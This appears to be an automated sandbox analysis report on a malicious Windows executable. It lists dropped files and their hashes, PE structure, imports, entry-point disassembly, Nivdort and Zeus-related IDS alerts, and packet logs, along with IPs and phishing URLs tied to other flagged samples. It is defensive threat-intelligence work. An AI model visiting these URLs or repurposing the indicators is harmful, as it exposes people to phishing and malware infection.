                                                                                                                                                                                                          • 188.225.39.170
                                                                                                                                                                                                          5F6Ny9UaKt.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • 185.114.247.170
                                                                                                                                                                                                          LisectAVT_2403002C_62.dllGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                          • 188.225.32.231
                                                                                                                                                                                                          qqMLbietPf.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • 185.114.247.170
                                                                                                                                                                                                          Reference ID6f5f047b6cdf41716e164ec64879e463.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 185.114.245.110
                                                                                                                                                                                                          https://sites.google.com/view/dcnoterialsecu/accueilGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 92.53.96.121
                                                                                                                                                                                                          AMAZON-02USExv453QQIX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 76.223.105.230
                                                                                                                                                                                                          OneDriveSetup.exeGet hashmaliciousZTratBrowse
                                                                                                                                                                                                          • 3.126.224.214
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 54.244.188.177
                                                                                                                                                                                                          Scanned Docs from Emnes Metal Sdn Bhd_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 76.223.67.189
                                                                                                                                                                                                          http://verizonwireless-employmentvalidation.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 3.124.93.206
                                                                                                                                                                                                          UjCrfOAkJJiZyZh.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                          • 75.2.115.196
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 54.244.188.177
                                                                                                                                                                                                          .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 52.42.85.34
                                                                                                                                                                                                          http://beonlineboo.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 35.165.37.251
                                                                                                                                                                                                          https://logicalisuk.my.salesforce.com/setup/emailverif?oid=00D3z000001dzz1&k=Cj4KNQoPMDBEM3owMDAwMDFkenoxEg8wMkczejAwMDAwMFdWOE4aDzAwNTN6MDAwMDBCdWh6dSAFGN_3tJGSMhIQI3v2gs0Smh5HbrrPi2pb3BoMcA-pPOdt_d3-rPC6InFa7HDV_iW9LDPj8xH7hSk3un-1pgfjZvlK5Tv9PNw3ZrbyGYfST1J6GqYfWaKhB7o4-QA7gl67FLrZibn5D9yjxqT_I5lQp1_GTYo4JMlLKQM4byvWuZajquUzFQE2W0EVG_exs3QFRWcL3FGdq-ebSw%3D%3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 99.81.213.111
                                                                                                                                                                                                          TANDEMUSvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.192.55
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.192.55
                                                                                                                                                                                                          https://berobv.nl/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          https://myallsouth.com/privacy-policy/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          http://www.gouv-link.com/reglementGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.130.221
                                                                                                                                                                                                          https://heyflow.id/new-document-share-with-youGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          QLLafoDdqv.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 15.197.172.60
                                                                                                                                                                                                          https://www.globalepic.co.kr/view.php?ud=202408011057515744edd3030223_29Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          http://telstra-103141.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.193.217
                                                                                                                                                                                                          http://telstra-107250.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 15.197.193.217

                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                          C:\Windows\whfkpbh\euwvjohdxkkj

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mtuXDnH1Di.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7
                                                                                                                                                                                                          Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:zon:8
                                                                                                                                                                                                          MD5:68678699ABEA681A3BEF7BC9C04AA0DB
                                                                                                                                                                                                          SHA1:645AEBCE823CBFA211ECD2FA4878A586CC4ABE8E
                                                                                                                                                                                                          SHA-256:10F46E566F4A87C8973338326C4C0E497E0920983CCFE6BA82F734B5A00C3C64
                                                                                                                                                                                                          SHA-512:7D197C701C93120144A167E7AF27009583D56D80DF9861DE0897C4E16A45AE12B94457EA048D4D4C3978E6EF32EED3B49185356B201E282B955C8FD80713ED94
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:..dd..b

                                                                                                                                                                                                          C:\whfkpbh\amdrhfskpcu.exe

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):279552
                                                                                                                                                                                                          Entropy (8bit):7.1352696053252345
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:TLg1drHvFTdNWJDRm03jJGxoyApQU/waqElD:Te5RTWr/TJpZ/h
                                                                                                                                                                                                          MD5:E4B47C06B5EED80FB44CFEA757525634
                                                                                                                                                                                                          SHA1:78B5133CD84E3D89EBCA4B36F33273DF6E70C3F4
                                                                                                                                                                                                          SHA-256:475C13AE1D446C61824315961E5838916AC4A3F28BC441AA8A2B39B81383EA4A
                                                                                                                                                                                                          SHA-512:BEF0195A513A28E7C9868BCA359A4F1726C9F8D15204B743C0E2467E6F6C68A67994E737C82997FEF0C2BB9DCFC206100A0A52E756D286FBAF1E56D2E04E7843
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2f..S...S...S....s..S...S..S.......S.......S.......S..Rich.S..........................PE..L....0.V.................R...........E.......p....@..........................`............@....................................P....................................................................................p...............................text....Q.......R.................. ..`.rdata..(I...p...J...V..............@..@.data...,...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\whfkpbh\euwvjohdxkkj

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mtuXDnH1Di.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7
                                                                                                                                                                                                          Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:zon:8
                                                                                                                                                                                                          MD5:68678699ABEA681A3BEF7BC9C04AA0DB
                                                                                                                                                                                                          SHA1:645AEBCE823CBFA211ECD2FA4878A586CC4ABE8E
                                                                                                                                                                                                          SHA-256:10F46E566F4A87C8973338326C4C0E497E0920983CCFE6BA82F734B5A00C3C64
                                                                                                                                                                                                          SHA-512:7D197C701C93120144A167E7AF27009583D56D80DF9861DE0897C4E16A45AE12B94457EA048D4D4C3978E6EF32EED3B49185356B201E282B955C8FD80713ED94
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:..dd..b

                                                                                                                                                                                                          C:\whfkpbh\idtpqzltyfy.exe

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\whfkpbh\qbf30bzbv7f7qnhdav.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):279552
                                                                                                                                                                                                          Entropy (8bit):7.1352696053252345
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:TLg1drHvFTdNWJDRm03jJGxoyApQU/waqElD:Te5RTWr/TJpZ/h
                                                                                                                                                                                                          MD5:E4B47C06B5EED80FB44CFEA757525634
                                                                                                                                                                                                          SHA1:78B5133CD84E3D89EBCA4B36F33273DF6E70C3F4
                                                                                                                                                                                                          SHA-256:475C13AE1D446C61824315961E5838916AC4A3F28BC441AA8A2B39B81383EA4A
                                                                                                                                                                                                          SHA-512:BEF0195A513A28E7C9868BCA359A4F1726C9F8D15204B743C0E2467E6F6C68A67994E737C82997FEF0C2BB9DCFC206100A0A52E756D286FBAF1E56D2E04E7843
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2f..S...S...S....s..S...S..S.......S.......S.......S..Rich.S..........................PE..L....0.V.................R...........E.......p....@..........................`............@....................................P....................................................................................p...............................text....Q.......R.................. ..`.rdata..(I...p...J...V..............@..@.data...,...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\whfkpbh\qbf30bzbv7f7qnhdav.exe

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\mtuXDnH1Di.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):279552
                                                                                                                                                                                                          Entropy (8bit):7.1352696053252345
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:TLg1drHvFTdNWJDRm03jJGxoyApQU/waqElD:Te5RTWr/TJpZ/h
                                                                                                                                                                                                          MD5:E4B47C06B5EED80FB44CFEA757525634
                                                                                                                                                                                                          SHA1:78B5133CD84E3D89EBCA4B36F33273DF6E70C3F4
                                                                                                                                                                                                          SHA-256:475C13AE1D446C61824315961E5838916AC4A3F28BC441AA8A2B39B81383EA4A
                                                                                                                                                                                                          SHA-512:BEF0195A513A28E7C9868BCA359A4F1726C9F8D15204B743C0E2467E6F6C68A67994E737C82997FEF0C2BB9DCFC206100A0A52E756D286FBAF1E56D2E04E7843
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2f..S...S...S....s..S...S..S.......S.......S.......S..Rich.S..........................PE..L....0.V.................R...........E.......p....@..........................`............@....................................P....................................................................................p...............................text....Q.......R.................. ..`.rdata..(I...p...J...V..............@..@.data...,...........................@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Entropy (8bit):7.1352696053252345
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:mtuXDnH1Di.exe
                                                                                                                                                                                                          File size:279'552 bytes
                                                                                                                                                                                                          MD5:e4b47c06b5eed80fb44cfea757525634
                                                                                                                                                                                                          SHA1:78b5133cd84e3d89ebca4b36f33273df6e70c3f4
                                                                                                                                                                                                          SHA256:475c13ae1d446c61824315961e5838916ac4a3f28bc441aa8a2b39b81383ea4a
                                                                                                                                                                                                          SHA512:bef0195a513a28e7c9868bca359a4f1726c9f8d15204b743c0e2467e6f6c68a67994e737c82997fef0c2bb9dcfc206100a0a52e756d286fbaf1e56d2e04e7843
                                                                                                                                                                                                          SSDEEP:6144:TLg1drHvFTdNWJDRm03jJGxoyApQU/waqElD:Te5RTWr/TJpZ/h
                                                                                                                                                                                                          TLSH:98549D44CD39512ACC968EFE4ABB37B2F45E587567E915C3438431C424602F8FABA78B
                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2f..S...S...S....s..S...S...S.......S.......S.......S..Rich.S..........................PE..L....0.V.................R.........

                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Entrypoint:0x424590
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                          Time Stamp:0x568930F7 [Sun Jan 3 14:32:23 2016 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                          OS Version Minor:1
                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                          File Version Minor:1
                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                                                                          Import Hash:6f0f6728fed938390cd1a7b493280d77

                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          mov eax, dword ptr [0043F75Ch]
                                                                                                                                                                                                          sar eax, 07h
                                                                                                                                                                                                          sub eax, 0E724248h
                                                                                                                                                                                                          and eax, 638AD6B6h
                                                                                                                                                                                                          cmp eax, D4FE12C8h
                                                                                                                                                                                                          je 00007FBADCDE5E96h
                                                                                                                                                                                                          movzx ecx, word ptr [00473A94h]
                                                                                                                                                                                                          or ecx, 9A29B7C6h
                                                                                                                                                                                                          mov word ptr [00473A94h], cx
                                                                                                                                                                                                          call 00007FBADCDE1ED3h
                                                                                                                                                                                                          mov edx, dword ptr [0043F5C4h]
                                                                                                                                                                                                          not edx
                                                                                                                                                                                                          sub edx, 2D98DF04h
                                                                                                                                                                                                          xor edx, 86D84936h
                                                                                                                                                                                                          cmp edx, D7ABF1EFh
                                                                                                                                                                                                          je 00007FBADCDE5E8Ch
                                                                                                                                                                                                          add dword ptr [0044A8A4h], 24D523FCh
                                                                                                                                                                                                          push esi
                                                                                                                                                                                                          call 00007FBADCDF1677h
                                                                                                                                                                                                          mov eax, dword ptr [00445EB0h]
                                                                                                                                                                                                          sub eax, 13C02B78h
                                                                                                                                                                                                          push 00437190h
                                                                                                                                                                                                          mov dword ptr [00447688h], eax
                                                                                                                                                                                                          inc dword ptr [00445EB0h]
                                                                                                                                                                                                          push 00437188h
                                                                                                                                                                                                          call 00007FBADCDDAC83h
                                                                                                                                                                                                          fld dword ptr [0047ACD4h]
                                                                                                                                                                                                          fadd qword ptr [0045F648h]
                                                                                                                                                                                                          add esp, 08h
                                                                                                                                                                                                          fld qword ptr [0044FAB0h]
                                                                                                                                                                                                          fld qword ptr [00459DF0h]
                                                                                                                                                                                                          fsubp st(2), st(0)
                                                                                                                                                                                                          fsubrp st(1), st(0)
                                                                                                                                                                                                          fstp qword ptr [0044FAB0h]
                                                                                                                                                                                                          call 00007FBADCDF2EA9h
                                                                                                                                                                                                          fld dword ptr [0047D39Ch]
                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                          fmul dword ptr [00486544h]
                                                                                                                                                                                                          fld dword ptr [0047A424h]
                                                                                                                                                                                                          fcomip st(0), st(1)
                                                                                                                                                                                                          fstp st(0)
                                                                                                                                                                                                          jbe 00007FBADCDE5E99h
                                                                                                                                                                                                          dec dword ptr [00000000h]

                                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                                                                                                          • [C++] VS2008 build 21022
                                                                                                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                                                                                                          • [LNK] VS2008 build 21022

                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3b0e00x50.rdata
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x8b0000x9ca4.reloc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x370000x188.rdata
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                          Sections

                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                          .text0x10000x351ea0x35200b8a604ad7d1ad7d6f5659a8bfca32505False0.6966911764705882data6.86562473291782IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .rdata0x370000x49280x4a009fa4f015e03b624e77fc713f54352d1cFalse0.8504539695945946COM executable for DOS7.1602946748436205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .data0x3c0000x4ef2c0x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .reloc0x8b0000xa0120xa200a9d11539c5aa2bd739792d7ebff48b74False0.6754195601851852data6.7897361685185675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                          Imports

                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                          GDI32.dllSetTextCharacterExtra, SetSystemPaletteUse, GetTextCharsetInfo, GetTextCharset, GetMapMode, GetTextColor, SetTextJustification, GetCurrentObject, GetMetaRgn, GetClipRgn, GetFontUnicodeRanges, GetTextCharacterExtra, GetSystemPaletteUse, GetFontLanguageInfo, GetStretchBltMode, GetPolyFillMode, GetObjectType, GetRandomRgn, SetTextAlign, GetNearestPaletteIndex, GetTextAlign, GetPixelFormat, GetDCBrushColor, GetBkColor, GetNearestColor, SetPixel
                                                                                                                                                                                                          USER32.dllEndPaint, GetCursor, GetDlgItem, GetMenuItemCount, SetWindowTextA, GetPropA, SendMessageA, MoveWindow, GetWindowDC, SetFocus, IsWindowUnicode, WindowFromDC, GetDC, LoadIconA, GetQueueStatus, EnableWindow, GetKeyboardType, EndDialog, GetDlgItemInt, GetInputState, CallWindowProcA, GetMenu, PostMessageA, GetMenuItemID, IsWindowEnabled, SetDlgItemTextA, GetWindowContextHelpId, CheckDlgButton, GetScrollPos, DrawTextA, GetForegroundWindow, RemovePropA, GetMenuState, BeginPaint, GetWindowLongA, ShowWindow, GetMenuContextHelpId
                                                                                                                                                                                                          KERNEL32.dllHeapAlloc, GetStdHandle, GlobalAlloc, GetModuleHandleA, GetCurrentThreadId, GetTickCount, GetLastError, GlobalSize, IsDebuggerPresent, GlobalFlags, MoveFileA, GlobalHandle, SizeofResource, IsProcessorFeaturePresent, LocalFlags, GetProcAddress, GetDriveTypeA, GetCurrentProcessId, GetFileTime, GetCurrentProcess, FlushFileBuffers, SetFilePointer, WriteFile, LockResource, GetFileType, CloseHandle, GetVersion, QueryPerformanceCounter, LoadResource, FindResourceA, DeleteFileA, GetProcessHeap

                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          2024-08-05T16:24:59.509195+0200UDP2018316ET MALWARE Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses53602611.1.1.1192.168.2.7
                                                                                                                                                                                                          2024-08-05T16:23:03.262802+0200TCP2815568ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort4970180192.168.2.735.164.78.200
                                                                                                                                                                                                          2024-08-05T16:23:00.468164+0200TCP2815568ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort4970080192.168.2.73.33.130.190
                                                                                                                                                                                                          2024-08-05T16:23:27.903814+0200UDP2018316ET MALWARE Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses53623721.1.1.1192.168.2.7
                                                                                                                                                                                                          2024-08-05T16:24:18.320810+0200TCP2815568ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort5962380192.168.2.73.33.130.190
                                                                                                                                                                                                          2024-08-05T16:23:16.089201+0200UDP2018316ET MALWARE Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses53650631.1.1.1192.168.2.7
                                                                                                                                                                                                          2024-08-05T16:23:07.857815+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804970234.246.200.160192.168.2.7
                                                                                                                                                                                                          2024-08-05T16:23:07.848514+0200TCP2815568ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort4970280192.168.2.734.246.200.160
                                                                                                                                                                                                          2024-08-05T16:23:21.358671+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804971554.244.188.177192.168.2.7
                                                                                                                                                                                                          2024-08-05T16:23:13.975372+0200TCP2815568ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort4970880192.168.2.785.13.130.3
                                                                                                                                                                                                          2024-08-05T16:24:48.786301+0200TCP2815568ETPRO MALWARE Terse HTTP 1.0 Request Possible Nivdort5962480192.168.2.735.164.78.200
                                                                                                                                                                                                          2024-08-05T16:23:03.286503+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst804970135.164.78.200192.168.2.7
                                                                                                                                                                                                          2024-08-05T16:24:48.791817+0200TCP2037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst805962435.164.78.200192.168.2.7

                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.003330946 CEST4970080192.168.2.73.33.130.190
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.011713982 CEST80497003.33.130.190192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.011903048 CEST4970080192.168.2.73.33.130.190
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.012031078 CEST4970080192.168.2.73.33.130.190
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.017030001 CEST80497003.33.130.190192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.467889071 CEST80497003.33.130.190192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.468163967 CEST4970080192.168.2.73.33.130.190
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.468492985 CEST80497003.33.130.190192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.468573093 CEST4970080192.168.2.73.33.130.190
                                                                                                                                                                                                          Aug 5, 2024 16:23:00.474752903 CEST80497003.33.130.190192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:02.490242004 CEST4970180192.168.2.735.164.78.200
                                                                                                                                                                                                          Aug 5, 2024 16:23:02.497309923 CEST804970135.164.78.200192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:02.497425079 CEST4970180192.168.2.735.164.78.200
                                                                                                                                                                                                          Aug 5, 2024 16:23:02.497464895 CEST4970180192.168.2.735.164.78.200
                                                                                                                                                                                                          Aug 5, 2024 16:23:02.502305984 CEST804970135.164.78.200192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.262451887 CEST804970135.164.78.200192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.262646914 CEST804970135.164.78.200192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.262801886 CEST4970180192.168.2.735.164.78.200
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.281527042 CEST4970180192.168.2.735.164.78.200
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.286503077 CEST804970135.164.78.200192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.082170963 CEST4970280192.168.2.734.246.200.160
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.088511944 CEST804970234.246.200.160192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.088696003 CEST4970280192.168.2.734.246.200.160
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.088696003 CEST4970280192.168.2.734.246.200.160
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.095143080 CEST804970234.246.200.160192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.847978115 CEST804970234.246.200.160192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.848292112 CEST804970234.246.200.160192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.848514080 CEST4970280192.168.2.734.246.200.160
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.848514080 CEST4970280192.168.2.734.246.200.160
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.857815027 CEST804970234.246.200.160192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.690298080 CEST4970380192.168.2.715.197.142.173
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.695185900 CEST804970315.197.142.173192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.695266008 CEST4970380192.168.2.715.197.142.173
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.695300102 CEST4970380192.168.2.715.197.142.173
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.700143099 CEST804970315.197.142.173192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.183926105 CEST804970315.197.142.173192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.184087992 CEST4970380192.168.2.715.197.142.173
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.185036898 CEST804970315.197.142.173192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.185087919 CEST4970380192.168.2.715.197.142.173
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.189647913 CEST804970315.197.142.173192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.592803001 CEST4970480192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.597723007 CEST804970415.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.597918987 CEST4970480192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.598023891 CEST4970480192.168.2.715.197.192.55
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.602919102 CEST804970415.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.119362116 CEST804970415.197.192.55192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.119513988 CEST804970415.197.192.55192.168.2.7
